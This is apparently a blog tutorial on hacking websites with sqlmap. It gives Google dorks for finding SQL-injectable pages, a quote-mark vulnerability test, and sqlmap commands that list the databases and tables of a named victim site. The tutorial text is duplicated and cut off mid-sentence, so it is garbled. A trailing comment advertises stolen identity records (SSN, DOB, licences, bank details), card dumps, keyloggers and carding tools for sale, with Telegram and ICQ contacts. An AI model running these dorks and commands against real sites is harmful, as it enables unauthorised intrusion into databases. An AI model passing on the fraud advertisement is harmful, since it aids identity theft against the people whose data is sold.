In this tutorial I am going to show you how to hack a website with slqmap on Kali Linux.
Introduction
[*]Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. This is all about sqlmap.
Now follow my steps to hack a website using sqlmap.
Step 1
[*]Find Sql vulnerable site.
I will give you some dorks which may help you finding websites vulnerable to Sql Injection.
Code:
]inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
Step 2
[*]Test if the website is vulnerable
]To test if the website is vulnerable to Sqli just add " ' " at the end of the url. Like on the image below:
And press enter. If error appears like on the image below it means the website is vulnerable.
(I'm not going to explain advanced ways to check the website for sql vulnerabiities because there are plenty of tutuorials about that on CHF)
Ok, so we found the target. Now let's go ahed.
Step 3
[*]Injection
Type this command in the terminal and hit enter like on the image below:
Code:
sqlmap -u "www.yourtaget.com/page.php?id=1" --dbs
(Insert the url that we checked for Sql Vulnerability)
Image has been scaled down 6% (700x460). Click this bar to view original image (741x486). Click image to open in new window.
Now we will get the database name of the website.
Image has been scaled down 6% (700x460). Click this bar to view original image (741x486). Click image to open in new window.
We got the two database ohridhot_ohrid
and information_schema we will select ohridhot_ohrid
database.
Let's get the tables of that database.
For that we need to enter this command on terminal and after that hit Enter.
Code:
sqlmap -u "http://www.yourvictim/page.php?id=1" -D ohridhot_ohrid --tables
Image has been scaled down 4% (700x49). Click this bar to view original image (723
Introduction
[*]Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. This is all about sqlmap.
Now follow my steps to hack a website using sqlmap.
Step 1
[*]Find Sql vulnerable site.
I will give you some dorks which may help you finding websites vulnerable to Sql Injection.
Code:
]inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
Step 2
[*]Test if the website is vulnerable
]To test if the website is vulnerable to Sqli just add " ' " at the end of the url. Like on the image below:
And press enter. If error appears like on the image below it means the website is vulnerable.
(I'm not going to explain advanced ways to check the website for sql vulnerabiities because there are plenty of tutuorials about that on CHF)
Ok, so we found the target. Now let's go ahed.
Step 3
[*]Injection
Type this command in the terminal and hit enter like on the image below:
Code:
sqlmap -u "www.yourtaget.com/page.php?id=1" --dbs
(Insert the url that we checked for Sql Vulnerability)
Image has been scaled down 6% (700x460). Click this bar to view original image (741x486). Click image to open in new window.
Now we will get the database name of the website.
Image has been scaled down 6% (700x460). Click this bar to view original image (741x486). Click image to open in new window.
We got the two database ohridhot_ohrid
and information_schema we will select ohridhot_ohrid
database.
Let's get the tables of that database.
For that we need to enter this command on terminal and after that hit Enter.
Code:
sqlmap -u "http://www.yourvictim/page.php?id=1" -D ohridhot_ohrid --tables
Image has been scaled down 4% (700x49). Click this bar to view original image (723
FULLZ AVAILABLE WITH HIGH CREDIT SCORES 700+
ReplyDelete(Spammed From Credit Bureau of USA)
=>Contact 24/7<=
Telegram> @leadsupplier
ICQ> 752822040
FRESHLY SPAMMED
VALID INFO WITH VALID DL EXPIRIES
*All info included*
NAME+SSN+DOB+DL+DL-STATE+ADDRESS
Employee & Bank details included
CC & CVV'S ONLY USA AVAILABLE
$1 for SSN+DOB
$2 for SSN+DOB+DL
$5 for High credit fullz 700+
(bulk order negotiable)
*Payment in all crypto currencies will be accepted
->You can buy few for testing
->Invalid or wrong info will be replaced
->Serious buyers needed for long term
PLEASE DON'T ASK ANYTHING FOR FREE
TOOLS & TUTORIALS AVAILABLE FOR SPAMMING, HACKING & CARDING
(Carding, spamming, hacking, scam page, Cash outs, dumps cash outs)
Ethical Hacking Tools & Tutorials
Kali linux
Facebook & Google hacking
SQL Injector
Bitcoin flasher
Keylogger & Keystroke Logger
Premium Accounts (Netflix, coinbase, FedEx, Pornhub, etc)
Paypal Logins
Bitcoin Cracker
SMTP Linux Root
DUMPS with pins track 1 and 2
Smtp's, Safe Socks, rdp's, VPN, Viruses
Cpanel
Php mailer
Server I.P's & Proxies
HQ Emails Combo
*If you need a valid vendor it's very prime chance, you'll never be disappointed*
CONTACT 24/7
Telegram> @leadsupplier
ICQ> 752822040